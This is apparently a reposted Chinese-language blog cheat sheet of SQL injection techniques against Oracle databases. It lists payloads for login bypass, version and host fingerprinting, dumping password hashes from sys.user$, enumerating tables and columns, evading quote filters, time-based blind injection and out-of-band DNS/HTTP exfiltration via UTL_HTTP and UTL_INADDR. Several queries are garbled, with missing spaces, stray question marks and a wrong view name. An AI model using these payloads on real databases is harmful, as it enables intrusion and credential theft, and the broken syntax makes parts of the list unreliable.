oracle text类型_数据库的一些注入技巧Oracle
默認數據庫
SYSTEM |
SYSAUX |
注釋
--
SELECT * FROM Users WHERE username = '' OR1=1?--' AND password = '';
查詢版本信息
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; |
SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; |
SELECT version FROM v$instance; |
數據庫憑證
SELECT username FROM all_users; | 支持所有版本 |
SELECT name, password from sys.user$; | 高權限, <= 10g |
SELECT name, spare4 from sys.user$; | 高權限, <= 11g |
查詢數據庫信息
查詢當前庫
SELECT name FROM v$database; |
SELECT ?instance_name FROM v$instance |
SELECT ?global_name FROM global_name |
SELECT ?SYS.DATABASE_NAME FROM DUAL |
用戶數據庫
SELECT DISTINCT owner FROM ?all_tables; |
主機名稱
SELECT host_name FROM v$instance; (Privileged) |
SELECT UTL_INADDR.get_host_name FROM dual; |
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; |
SELECT UTL_INADDR.get_host_address FROM dual; |
查詢表和列
查詢表
SELECT table_name FROM ?all_tables; |
查詢列
SELECT column_name FROMall_tab_columns;
從列中查詢表
SELECT column_name FROM all_tab_columns WHEREtable_name = 'Users';
從表中查詢列
SELECT table_name FROMall_tab_tables WHERE column_name = 'password';
查詢多個表信息
SELECT RTRIM(XMLAGG(XMLELEMENT(e, ?table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM ?all_tables; |
避免使用引號
SELECT 0x09120911091 FROM dual; | Hex編碼 |
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; | CHR() 函數 |
字符串拼接
SELECT 'a'||'d'||'mi'||'n' FROM ?dual; |
條件語句
SELECT CASE WHEN 1=1 THEN 'true' ?ELSE 'false' END FROM dual |
時間注入
SELECTUTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
AND (SELECT COUNT(*) FROM all_users t1, all_userst2, all_users t3, all_users t4, all_users t5) > 0 AND 300 >ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
查詢權限
SELECT privilege FROM ?session_privs; |
SELECT ?grantee, granted_role FROM dba_role_privs; (Privileged) |
DNS帶外
SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual; |
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual; |
同類型文章賞析
數據庫的一些注入技巧-sqlserver
數據庫的一些注入技巧-mysql
全文pdf下載地址:
https://www.chinabaiker.com/sql.pdf
總結
以上是生活随笔為你收集整理的oracle text类型_数据库的一些注入技巧Oracle的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 多商户商城源码_多商户小程序开发搭建?开
- 下一篇: python是后端语言还是前端语言_从前